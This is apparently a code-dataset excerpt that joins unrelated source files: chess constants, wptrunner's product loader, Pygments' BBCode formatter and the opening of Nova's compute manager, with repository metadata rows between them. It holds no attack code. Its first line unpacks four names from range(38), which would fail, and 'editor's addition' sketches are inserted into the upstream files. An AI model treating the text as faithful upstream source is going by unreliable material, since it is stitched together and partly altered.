WHITE_ENGINE_DIED, BLACK_ENGINE_DIED, DISCONNECTED, UNKNOWN_REASON = range(38)
UNDOABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH,
DRAW_REPITITION, DRAW_STALEMATE, DRAW_AGREE, DRAW_CALLFLAG, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, \
DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_MATE, WON_NOMATERIAL, WON_CALLFLAG, WON_RESIGN)
UNRESUMEABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH, \
DRAW_REPITITION, DRAW_STALEMATE, WON_MATE, WON_NOMATERIAL)
# Player actions
RESIGNATION = "resignation"
FLAG_CALL = "flag call"
DRAW_OFFER = "draw offer"
ABORT_OFFER = "abort offer"
ADJOURN_OFFER = "adjourn offer"
PAUSE_OFFER = "pause offer"
RESUME_OFFER = "resume offer"
SWITCH_OFFER = "switch offer"
TAKEBACK_OFFER = "takeback offer"
MATCH_OFFER = "match offer"
HURRY_ACTION = "hurry action"
CHAT_ACTION = "chat action"
ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, \
PAUSE_OFFER, RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, \
MATCH_OFFER, HURRY_ACTION, CHAT_ACTION)
OFFERS = (DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, PAUSE_OFFER, \
RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, MATCH_OFFER)
INGAME_ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, \
ADJOURN_OFFER, PAUSE_OFFER, SWITCH_OFFER, HURRY_ACTION)
# A few nice to have boards
FEN_EMPTY = "4k3/8/8/8/8/8/8/4K3 w - - 0 1"
FEN_START = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"
################################################################################
# Search values #
################################################################################
hashfALPHA, hashfBETA, hashfEXACT, hashfBAD = range(4)
# Engine modes
NORMAL, ANALYZING, INVERSE_ANALYZING = range(3)
################################################################################
# Piece types #
################################################################################
# BPAWN is a pawn that moves in the opposite direction
EMPTY, PAWN, KNIGHT, BISHOP, ROOK, QUEEN, KING, BPAWN = range(8)
# Is sliding piece
sliders = [ False, False, False, True, True, True, False, False ]
# Piece signs
reprSign = ["", "P", "N", "B", "R", "Q", "K"]
chr2Sign = {"k":KING, "q": QUEEN, "r": ROOK, "b": BISHOP, "n": KNIGHT, "p":PAWN}
chrU2Sign = {"K":KING, "Q": QUEEN, "R": ROOK, "B": BISHOP, "N": KNIGHT, "P":PAWN}
################################################################################
# Move values #
################################################################################
NORMAL_MOVE, QUEEN_CASTLE, KING_CASTLE, ENPASSANT, \
KNIGHT_PROMOTION, BISHOP_PROMOTION, ROOK_PROMOTION, QUEEN_PROMOTION, KING_PROMOTION, NULL_MOVE, DROP = range(11)
PROMOTIONS = (KING_PROMOTION, QUEEN_PROMOTION, ROOK_PROMOTION, BISHOP_PROMOTION, KNIGHT_PROMOTION)
# Algebraic notation types: Short, Long, Figure and Simpe
SAN, LAN, FAN, AN = range(4)
# Castling notation types: e.g., O-O, e1g1, e1h1
CASTLE_SAN, CASTLE_KK, CASTLE_KR = range(3)
FAN_PIECES = [
["", u"♙", u"♘", u"♗", u"♖", u"♕", u"♔", ""],
["", u"♟", u"♞", u"♝", u"♜", u"♛", u"♚", ""]
]
################################################################################
# Castling values #
################################################################################
W_OO, W_OOO, B_OO, B_OOO = [2**i for i in range(4)]
CAS_FLAGS = ((W_OOO,W_OO),(B_OOO,B_OO))
W_CASTLED, B_CASTLED = [2**i for i in range(2)]
################################################################################
# Cords types #
################################################################################
A1, B1, C1, D1, E1, F1, G1, H1, \
A2, B2, C2, D2, E2, F2, G2, H2, \
A3, B3, C3, D3, E3, F3, G3, H3, \
A4, B4, C4, D4, E4, F4, G4, H4, \
A5, B5, C5, D5, E5, F5, G5, H5, \
A6, B6, C6, D6, E6, F6, G6, H6, \
A7, B7, C7, D7, E7, F7, G7, H7, \
A8, B8, C8, D8, E8, F8, G8, H8 = range (64)
reprCord = [
"a1", "b1", "c1", "d1", "e1", "f1", "g1", "h1",
"a2", "b2", "c2", "d2", "e2", "f2", "g2", "h2",
"a3", "b3", "c3", "d3", "e3", "f3", "g3", "h3",
"a4", "b4", "c4", "d4", "e4", "f4", "g4", "h4",
"a5", "b5", "c5", "d5", "e5", "f5", "g5", "h5",
"a6", "b6", "c6", "d6", "e6", "f6", "g6", "h6",
"a7", "b7", "c7", "d7", "e7", "f7", "g7", "h7",
"a8", "b8", "c8", "d8", "e8", "f8", "g8", "h8"
]
reprFile = ["a", "b", "c", "d", "e", "f", "g", "h"]
reprRank = ["1", "2", "3", "4", "5", "6", "7", "8"]
cordDic = {}
for cord, name in enumerate(reprCord):
    cordDic[name] = cord
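# cordDic maps algebraic square names to the 0-63 board indices above
# (A1 = 0 ... H8 = 63), so for example cordDic["e4"] == E4 == 28.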
################################################################################
# User interface #
################################################################################
# Hint modes
OPENING, ENDGAME, HINT, SPY = ["opening", "endgame", "hint", "spy"]
# Sound settings
SOUND_MUTE, SOUND_BEEP, SOUND_SELECT, SOUND_URI = range(4)
# Brush types. Send piece object for Piece brush
CLEAR, ENPAS = range(2)
# Main menu items
GAME_MENU_ITEMS = ("save_game1", "save_game_as1", "export_position1", "analyze_game1",
"properties1", "close1")
ACTION_MENU_ITEMS = ("abort", "adjourn", "draw", "pause1", "resume1", "undo1",
"call_flag", "resign", "ask_to_move")
VIEW_MENU_ITEMS = ("rotate_board1", "show_sidepanels", "hint_mode", "spy_mode")
MENU_ITEMS = GAME_MENU_ITEMS + ACTION_MENU_ITEMS + VIEW_MENU_ITEMS
################################################################################
# Subprocess #
################################################################################
SUBPROCESS_PTY, SUBPROCESS_SUBPROCESS, SUBPROCESS_FORK = range(3)
| gpl-3.0 | 4,613,990,617,096,706,000 | 5,332,708,665,482,615,000 | 42.841346 | 112 | 0.491063 | false |
sliz1/servo | tests/wpt/harness/wptrunner/products.py | 118 | 2500 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import importlib
import imp
from .browsers import product_list
def products_enabled(config):
    names = config.get("products", {}).keys()
    if not names:
        return product_list
    else:
        return names


def product_module(config, product):
    here = os.path.join(os.path.split(__file__)[0])
    product_dir = os.path.join(here, "browsers")

    if product not in products_enabled(config):
        raise ValueError("Unknown product %s" % product)

    path = config.get("products", {}).get(product, None)
    if path:
        module = imp.load_source('wptrunner.browsers.' + product, path)
    else:
        module = importlib.import_module("wptrunner.browsers." + product)

    if not hasattr(module, "__wptrunner__"):
        raise ValueError("Product module does not define __wptrunner__ variable")

    return module


def load_product(config, product):
    module = product_module(config, product)
    data = module.__wptrunner__

    check_args = getattr(module, data["check_args"])
    browser_cls = getattr(module, data["browser"])
    browser_kwargs = getattr(module, data["browser_kwargs"])
    executor_kwargs = getattr(module, data["executor_kwargs"])
    env_options = getattr(module, data["env_options"])()
    run_info_extras = (getattr(module, data["run_info_extras"])
                       if "run_info_extras" in data else lambda **kwargs: {})

    executor_classes = {}
    for test_type, cls_name in data["executor"].iteritems():
        cls = getattr(module, cls_name)
        executor_classes[test_type] = cls

    return (check_args,
            browser_cls, browser_kwargs,
            executor_classes, executor_kwargs,
            env_options, run_info_extras)


def load_product_update(config, product):
    """Return tuple of (property_order, boolean_properties) indicating the
    run_info properties to use when constructing the expectation data for
    this product. None for either key indicates that the default keys
    appropriate for distinguishing based on platform will be used."""

    module = product_module(config, product)
    data = module.__wptrunner__

    update_properties = (getattr(module, data["update_properties"])()
                         if "update_properties" in data else (None, None))

    return update_properties
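# Typical use by the test runner (names as returned above):
#     (check_args, browser_cls, browser_kwargs, executor_classes,
#      executor_kwargs, env_options, run_info_extras) = load_product(config, "firefox")
# "firefox" here is only an example product name; any key reported by
# products_enabled(config) is valid.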
| mpl-2.0 | -3,488,457,681,735,174,000 | -8,006,708,692,965,102,000 | 33.722222 | 81 | 0.6644 | false |
vicky2135/lucious | oscar/lib/python2.7/site-packages/pygments/formatters/bbcode.py | 31 | 3314 |
# -*- coding: utf-8 -*-
"""
pygments.formatters.bbcode
~~~~~~~~~~~~~~~~~~~~~~~~~~
BBcode formatter.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt
__all__ = ['BBCodeFormatter']
class BBCodeFormatter(Formatter):
"""
Format tokens with BBcodes. These formatting codes are used by many
bulletin boards, so you can highlight your sourcecode with pygments before
posting it there.
This formatter has no support for background colors and borders, as there
are no common BBcode tags for that.
Some board systems (e.g. phpBB) don't support colors in their [code] tag,
so you can't use the highlighting together with that tag.
Text in a [code] tag usually is shown with a monospace font (which this
formatter can do with the ``monofont`` option) and no spaces (which you
need for indentation) are removed.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`codetag`
If set to true, put the output into ``[code]`` tags (default:
``false``)
`monofont`
If set to true, add a tag to show the code with a monospace font
(default: ``false``).
"""
name = 'BBCode'
aliases = ['bbcode', 'bb']
filenames = []
def __init__(self, **options):
Formatter.__init__(self, **options)
self._code = get_bool_opt(options, 'codetag', False)
self._mono = get_bool_opt(options, 'monofont', False)
self.styles = {}
self._make_styles()
def _make_styles(self):
for ttype, ndef in self.style:
start = end = ''
if ndef['color']:
start += '[color=#%s]' % ndef['color']
end = '[/color]' + end
if ndef['bold']:
start += '[b]'
end = '[/b]' + end
if ndef['italic']:
start += '[i]'
end = '[/i]' + end
if ndef['underline']:
start += '[u]'
end = '[/u]' + end
# there are no common BBcodes for background-color and border
self.styles[ttype] = start, end
def format_unencoded(self, tokensource, outfile):
if self._code:
outfile.write('[code]')
if self._mono:
outfile.write('[font=monospace]')
lastval = ''
lasttype = None
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
if ttype == lasttype:
lastval += value
else:
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
lastval = value
lasttype = ttype
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
if self._mono:
outfile.write('[/font]')
if self._code:
outfile.write('[/code]')
if self._code or self._mono:
outfile.write('\n')
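# Illustrative sketch (editor's addition, not part of the original module):
# typical use of BBCodeFormatter through pygments.highlight(); the sample
# source string is arbitrary.
def _example_bbcode_highlight(source="print('hello')"):
    from pygments import highlight
    from pygments.lexers import PythonLexer

    # codetag/monofont wrap the output in [code] and [font=monospace] tags,
    # as described in the class docstring above.
    return highlight(source, PythonLexer(),
                     BBCodeFormatter(codetag=True, monofont=True))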
| bsd-3-clause | -5,017,909,870,804,534,000 | 4,530,058,659,867,485,000 | 29.40367 | 78 | 0.539529 | false |
alexandrucoman/vbox-nova-driver | nova/compute/manager.py | 1 | 323194 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all processes relating to instances (guest vms).
The :py:class:`ComputeManager` class is a :py:class:`nova.manager.Manager` that
handles RPC calls relating to creating instances. It is responsible for
building a disk image, launching it via the underlying virtualization driver,
responding to calls to check its state, attaching persistent storage, and
terminating it.
"""
import base64
import contextlib
import functools
import socket
import sys
import time
import traceback
import uuid
from cinderclient import exceptions as cinder_exception
import eventlet.event
from eventlet import greenthread
import eventlet.semaphore
import eventlet.timeout
from keystoneclient import exceptions as keystone_exception
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import timeutils
import six
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova.cloudpipe import pipelib
from nova import compute
from nova.compute import build_results
from nova.compute import power_state
from nova.compute import resource_tracker
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova import consoleauth
import nova.context
from nova import exception
from nova import hooks
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova.image import glance
from nova import manager
from nova import network
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import loopingcall
from nova.openstack.common import periodic_task
from nova import paths
from nova import rpc
from nova import safe_utils
from nova.scheduler import client as scheduler_client
from nova.scheduler import rpcapi as scheduler_rpcapi
from nova import utils
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import storage_users
from nova.virt import virtapi
from nova import volume
from nova.volume import encryptors
compute_opts = [
cfg.StrOpt('console_host',
default=socket.gethostname(),
help='Console proxy host to use to connect '
'to instances on this host.'),
cfg.StrOpt('default_access_ip_network_name',
help='Name of network to use to set access IPs for instances'),
cfg.BoolOpt('defer_iptables_apply',
default=False,
help='Whether to batch up the application of IPTables rules'
' during a host restart and apply all at the end of the'
' init phase'),
cfg.StrOpt('instances_path',
default=paths.state_path_def('instances'),
help='Where instances are stored on disk'),
cfg.BoolOpt('instance_usage_audit',
default=False,
help="Generate periodic compute.instance.exists"
" notifications"),
cfg.IntOpt('live_migration_retry_count',
default=30,
help="Number of 1 second retries needed in live_migration"),
cfg.BoolOpt('resume_guests_state_on_host_boot',
default=False,
help='Whether to start guests that were running before the '
'host rebooted'),
cfg.IntOpt('network_allocate_retries',
default=0,
help="Number of times to retry network allocation on failures"),
cfg.IntOpt('max_concurrent_builds',
default=10,
help='Maximum number of instance builds to run concurrently'),
cfg.IntOpt('block_device_allocate_retries',
default=60,
help='Number of times to retry block device'
' allocation on failures')
]
interval_opts = [
cfg.IntOpt('bandwidth_poll_interval',
default=600,
help='Interval to pull network bandwidth usage info. Not '
'supported on all hypervisors. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('sync_power_state_interval',
default=600,
help='Interval to sync power states between the database and '
'the hypervisor. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt("heal_instance_info_cache_interval",
default=60,
help="Number of seconds between instance network information "
"cache updates"),
cfg.IntOpt('reclaim_instance_interval',
default=0,
help='Interval in seconds for reclaiming deleted instances'),
cfg.IntOpt('volume_usage_poll_interval',
default=0,
help='Interval in seconds for gathering volume usages'),
cfg.IntOpt('shelved_poll_interval',
default=3600,
help='Interval in seconds for polling shelved instances to '
                    'offload. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('shelved_offload_time',
default=0,
help='Time in seconds before a shelved instance is eligible '
                    'for removal from a host. -1 never offload, 0 offload '
'immediately when shelved'),
cfg.IntOpt('instance_delete_interval',
default=300,
help='Interval in seconds for retrying failed instance file '
'deletes. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('block_device_allocate_retries_interval',
default=3,
help='Waiting time interval (seconds) between block'
' device allocation retries on failures'),
cfg.IntOpt('scheduler_instance_sync_interval',
default=120,
help='Waiting time interval (seconds) between sending the '
'scheduler a list of current instance UUIDs to verify '
'that its view of instances is in sync with nova. If the '
'CONF option `scheduler_tracks_instance_changes` is '
'False, changing this option will have no effect.'),
]
timeout_opts = [
cfg.IntOpt("reboot_timeout",
default=0,
help="Automatically hard reboot an instance if it has been "
"stuck in a rebooting state longer than N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("instance_build_timeout",
default=0,
help="Amount of time in seconds an instance can be in BUILD "
"before going into ERROR status. "
"Set to 0 to disable."),
cfg.IntOpt("rescue_timeout",
default=0,
help="Automatically unrescue an instance after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("resize_confirm_window",
default=0,
help="Automatically confirm resizes after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("shutdown_timeout",
default=60,
help="Total amount of time to wait in seconds for an instance "
"to perform a clean shutdown."),
]
running_deleted_opts = [
cfg.StrOpt("running_deleted_instance_action",
default="reap",
help="Action to take if a running deleted instance is detected."
" Valid options are 'noop', 'log', 'shutdown', or 'reap'. "
"Set to 'noop' to take no action."),
cfg.IntOpt("running_deleted_instance_poll_interval",
default=1800,
help="Number of seconds to wait between runs of the cleanup "
"task."),
cfg.IntOpt("running_deleted_instance_timeout",
default=0,
help="Number of seconds after being deleted when a running "
"instance should be considered eligible for cleanup."),
]
instance_cleaning_opts = [
cfg.IntOpt('maximum_instance_delete_attempts',
default=5,
help='The number of times to attempt to reap an instance\'s '
'files.'),
]
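# Illustrative sketch (editor's addition, not part of the original module):
# how a few of the options registered below might appear in nova.conf on a
# compute node; the values are examples, not recommendations.
#
#   [DEFAULT]
#   instances_path = /var/lib/nova/instances
#   resume_guests_state_on_host_boot = True
#   max_concurrent_builds = 10
#   shutdown_timeout = 60
#   running_deleted_instance_action = reap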
CONF = cfg.CONF
CONF.register_opts(compute_opts)
CONF.register_opts(interval_opts)
CONF.register_opts(timeout_opts)
CONF.register_opts(running_deleted_opts)
CONF.register_opts(instance_cleaning_opts)
CONF.import_opt('allow_resize_to_same_host', 'nova.compute.api')
CONF.import_opt('console_topic', 'nova.console.rpcapi')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('vnc_enabled', 'nova.vnc')
CONF.import_opt('enabled', 'nova.spice', group='spice')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('image_cache_manager_interval', 'nova.virt.imagecache')
CONF.import_opt('enabled', 'nova.rdp', group='rdp')
CONF.import_opt('html5_proxy_base_url', 'nova.rdp', group='rdp')
CONF.import_opt('enabled', 'nova.console.serial', group='serial_console')
CONF.import_opt('base_url', 'nova.console.serial', group='serial_console')
CONF.import_opt('destroy_after_evacuate', 'nova.utils', group='workarounds')
CONF.import_opt('scheduler_tracks_instance_changes',
'nova.scheduler.host_manager')
CONF.import_opt('vrde_password_length',
'nova.virt.virtualbox.consoleops', group='virtualbox')
CONF.import_opt('vrde_require_instance_uuid_as_password',
'nova.virt.virtualbox.consoleops', group='virtualbox')
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
@utils.expects_func_args('migration')
def errors_out_migration(function):
"""Decorator to error out migration on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except Exception as ex:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
migration = keyed_args['migration']
# NOTE(rajesht): If InstanceNotFound error is thrown from
# decorated function, migration status should be set to
# 'error', without checking current migration status.
if not isinstance(ex, exception.InstanceNotFound):
status = migration.status
if status not in ['migrating', 'post-migrating']:
return
migration.status = 'error'
try:
with migration.obj_as_admin():
migration.save()
except Exception:
LOG.debug('Error setting migration status '
'for instance %s.',
migration.instance_uuid, exc_info=True)
return decorated_function
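# Illustrative sketch (editor's addition, not part of the original module):
# how a migration-related manager method would use the decorator above; the
# method name and body are hypothetical.
@errors_out_migration
def _example_errors_out_migration_usage(self, context, instance, migration):
    # Any exception raised here flips migration.status to 'error' (unless
    # the migration has already moved past 'post-migrating') before the
    # exception propagates to the caller.
    raise exception.MigrationError(reason='illustrative failure')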
@utils.expects_func_args('instance')
def reverts_task_state(function):
"""Decorator to revert task_state on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.UnexpectedTaskStateError as e:
# Note(maoy): unexpected task state means the current
# task is preempted. Do not clear task state in this
# case.
with excutils.save_and_reraise_exception():
LOG.info(_LI("Task possibly preempted: %s"),
e.format_message())
except Exception:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
# NOTE(mriedem): 'instance' must be in keyed_args because we
# have utils.expects_func_args('instance') decorating this
# method.
instance_uuid = keyed_args['instance']['uuid']
try:
self._instance_update(context,
instance_uuid,
task_state=None)
except exception.InstanceNotFound:
# We might delete an instance that failed to build shortly
                    # after it errored out; this is an expected case and we
# should not trace on it.
pass
except Exception as e:
msg = _LW("Failed to revert task state for instance. "
"Error: %s")
LOG.warning(msg, e, instance_uuid=instance_uuid)
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_fault(function):
"""Wraps a method to catch exceptions related to instances.
This decorator wraps a method to catch any exceptions having to do with
an instance that may get thrown. It then logs an instance fault in the db.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.InstanceNotFound:
raise
except Exception as e:
# NOTE(gtt): If argument 'instance' is in args rather than kwargs,
# we will get a KeyError exception which will cover up the real
# exception. So, we update kwargs with the values from args first.
# then, we can get 'instance' from kwargs easily.
kwargs.update(dict(zip(function.func_code.co_varnames[2:], args)))
with excutils.save_and_reraise_exception():
compute_utils.add_instance_fault_from_exc(context,
kwargs['instance'], e, sys.exc_info())
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_event(function):
"""Wraps a method to log the event taken on the instance, and result.
This decorator wraps a method to log the start and result of an event, as
part of an action taken on an instance.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context, *args,
**kwargs)
instance_uuid = keyed_args['instance']['uuid']
event_name = 'compute_{0}'.format(function.func_name)
with compute_utils.EventReporter(context, event_name, instance_uuid):
return function(self, context, *args, **kwargs)
return decorated_function
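# Illustrative sketch (editor's addition, not part of the original module):
# the way ComputeManager methods below typically stack these wrappers; the
# method itself is hypothetical, only the decorator ordering mirrors real
# usage.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def _example_decorated_instance_method(self, context, instance):
    # wrap_instance_event records a compute_* action event for the instance,
    # wrap_instance_fault stores an instance fault if an exception escapes,
    # reverts_task_state clears instance.task_state on unexpected errors and
    # wrap_exception emits an error notification.
    pass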
@utils.expects_func_args('image_id', 'instance')
def delete_image_on_error(function):
"""Used for snapshot related method to ensure the image created in
compute.api is deleted when an error occurs.
"""
@functools.wraps(function)
def decorated_function(self, context, image_id, instance,
*args, **kwargs):
try:
return function(self, context, image_id, instance,
*args, **kwargs)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug("Cleaning up image %s", image_id,
exc_info=True, instance=instance)
try:
self.image_api.delete(context, image_id)
except Exception:
LOG.exception(_LE("Error while trying to clean up "
"image %s"), image_id,
instance=instance)
return decorated_function
# TODO(danms): Remove me after Icehouse
# NOTE(mikal): if the method being decorated has more than one decorator, then
# put this one first. Otherwise the various exception handling decorators do
# not function correctly.
def object_compat(function):
"""Wraps a method that expects a new-world instance
This provides compatibility for callers passing old-style dict
instances.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
def _load_instance(instance_or_dict):
if isinstance(instance_or_dict, dict):
# try to get metadata and system_metadata for most cases but
# only attempt to load those if the db instance already has
# those fields joined
metas = [meta for meta in ('metadata', 'system_metadata')
if meta in instance_or_dict]
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance_or_dict,
expected_attrs=metas)
instance._context = context
return instance
return instance_or_dict
try:
kwargs['instance'] = _load_instance(kwargs['instance'])
except KeyError:
args = (_load_instance(args[0]),) + args[1:]
migration = kwargs.get('migration')
if isinstance(migration, dict):
migration = objects.Migration._from_db_object(
context.elevated(), objects.Migration(),
migration)
kwargs['migration'] = migration
return function(self, context, *args, **kwargs)
return decorated_function
# TODO(danms): Remove me after Icehouse
def aggregate_object_compat(function):
"""Wraps a method that expects a new-world aggregate."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
aggregate = kwargs.get('aggregate')
if isinstance(aggregate, dict):
aggregate = objects.Aggregate._from_db_object(
context.elevated(), objects.Aggregate(),
aggregate)
kwargs['aggregate'] = aggregate
return function(self, context, *args, **kwargs)
return decorated_function
class InstanceEvents(object):
def __init__(self):
self._events = {}
@staticmethod
def _lock_name(instance):
return '%s-%s' % (instance.uuid, 'events')
def prepare_for_instance_event(self, instance, event_name):
"""Prepare to receive an event for an instance.
This will register an event for the given instance that we will
wait on later. This should be called before initiating whatever
action will trigger the event. The resulting eventlet.event.Event
object should be wait()'d on to ensure completion.
:param instance: the instance for which the event will be generated
:param event_name: the name of the event we're expecting
:returns: an event object that should be wait()'d on
"""
if self._events is None:
# NOTE(danms): We really should have a more specific error
# here, but this is what we use for our default error case
raise exception.NovaException('In shutdown, no new events '
'can be scheduled')
@utils.synchronized(self._lock_name(instance))
def _create_or_get_event():
if instance.uuid not in self._events:
self._events.setdefault(instance.uuid, {})
return self._events[instance.uuid].setdefault(
event_name, eventlet.event.Event())
LOG.debug('Preparing to wait for external event %(event)s',
{'event': event_name}, instance=instance)
return _create_or_get_event()
def pop_instance_event(self, instance, event):
"""Remove a pending event from the wait list.
This will remove a pending event from the wait list so that it
can be used to signal the waiters to wake up.
:param instance: the instance for which the event was generated
:param event: the nova.objects.external_event.InstanceExternalEvent
that describes the event
:returns: the eventlet.event.Event object on which the waiters
are blocked
"""
no_events_sentinel = object()
no_matching_event_sentinel = object()
@utils.synchronized(self._lock_name(instance))
def _pop_event():
if not self._events:
LOG.debug('Unexpected attempt to pop events during shutdown',
instance=instance)
return no_events_sentinel
events = self._events.get(instance.uuid)
if not events:
return no_events_sentinel
_event = events.pop(event.key, None)
if not events:
del self._events[instance.uuid]
if _event is None:
return no_matching_event_sentinel
return _event
result = _pop_event()
if result is no_events_sentinel:
LOG.debug('No waiting events found dispatching %(event)s',
{'event': event.key},
instance=instance)
return None
elif result is no_matching_event_sentinel:
LOG.debug('No event matching %(event)s in %(events)s',
{'event': event.key,
'events': self._events.get(instance.uuid, {}).keys()},
instance=instance)
return None
else:
return result
def clear_events_for_instance(self, instance):
"""Remove all pending events for an instance.
This will remove all events currently pending for an instance
and return them (indexed by event name).
:param instance: the instance for which events should be purged
:returns: a dictionary of {event_name: eventlet.event.Event}
"""
@utils.synchronized(self._lock_name(instance))
def _clear_events():
if self._events is None:
LOG.debug('Unexpected attempt to clear events during shutdown',
instance=instance)
return dict()
return self._events.pop(instance.uuid, {})
return _clear_events()
def cancel_all_events(self):
our_events = self._events
# NOTE(danms): Block new events
self._events = None
for instance_uuid, events in our_events.items():
for event_name, eventlet_event in events.items():
LOG.debug('Canceling in-flight event %(event)s for '
'instance %(instance_uuid)s',
{'event': event_name,
'instance_uuid': instance_uuid})
name, tag = event_name.split('-', 1)
event = objects.InstanceExternalEvent(
instance_uuid=instance_uuid,
name=name, status='failed',
tag=tag, data={})
eventlet_event.send(event)
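# Illustrative sketch (editor's addition, not part of the original module):
# the intended hand-off around InstanceEvents. A waiter registers first and
# blocks on the returned eventlet Event; the handler for external instance
# events later pops the matching entry and signals it.
def _example_instance_events_flow(instance_events, instance, external_event):
    # Waiter side (registered *before* triggering the external action):
    waitable = instance_events.prepare_for_instance_event(instance,
                                                          external_event.key)
    # ... trigger the action that will eventually produce the event ...
    # Signaller side (driven by the external-event RPC handler):
    pending = instance_events.pop_instance_event(instance, external_event)
    if pending is not None:
        pending.send(external_event)
    # Waiter side resumes once send() has been called:
    return waitable.wait()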
class ComputeVirtAPI(virtapi.VirtAPI):
def __init__(self, compute):
super(ComputeVirtAPI, self).__init__()
self._compute = compute
def provider_fw_rule_get_all(self, context):
return self._compute.conductor_api.provider_fw_rule_get_all(context)
def _default_error_callback(self, event_name, instance):
raise exception.NovaException(_('Instance event failed'))
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
"""Plan to wait for some events, run some code, then wait.
This context manager will first create plans to wait for the
provided event_names, yield, and then wait for all the scheduled
events to complete.
Note that this uses an eventlet.timeout.Timeout to bound the
operation, so callers should be prepared to catch that
failure and handle that situation appropriately.
If the event is not received by the specified timeout deadline,
eventlet.timeout.Timeout is raised.
If the event is received but did not have a 'completed'
status, a NovaException is raised. If an error_callback is
provided, instead of raising an exception as detailed above
for the failure case, the callback will be called with the
event_name and instance, and can return True to continue
waiting for the rest of the events, False to stop processing,
or raise an exception which will bubble up to the waiter.
:param instance: The instance for which an event is expected
:param event_names: A list of event names. Each element can be a
string event name or tuple of strings to
indicate (name, tag).
:param deadline: Maximum number of seconds we should wait for all
of the specified events to arrive.
:param error_callback: A function to be called if an event arrives
"""
if error_callback is None:
error_callback = self._default_error_callback
events = {}
for event_name in event_names:
if isinstance(event_name, tuple):
name, tag = event_name
event_name = objects.InstanceExternalEvent.make_key(
name, tag)
try:
events[event_name] = (
self._compute.instance_events.prepare_for_instance_event(
instance, event_name))
except exception.NovaException:
error_callback(event_name, instance)
# NOTE(danms): Don't wait for any of the events. They
# should all be canceled and fired immediately below,
# but don't stick around if not.
deadline = 0
yield
with eventlet.timeout.Timeout(deadline):
for event_name, event in events.items():
actual_event = event.wait()
if actual_event.status == 'completed':
continue
decision = error_callback(event_name, instance)
if decision is False:
break
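# Illustrative sketch (editor's addition, not part of the original module):
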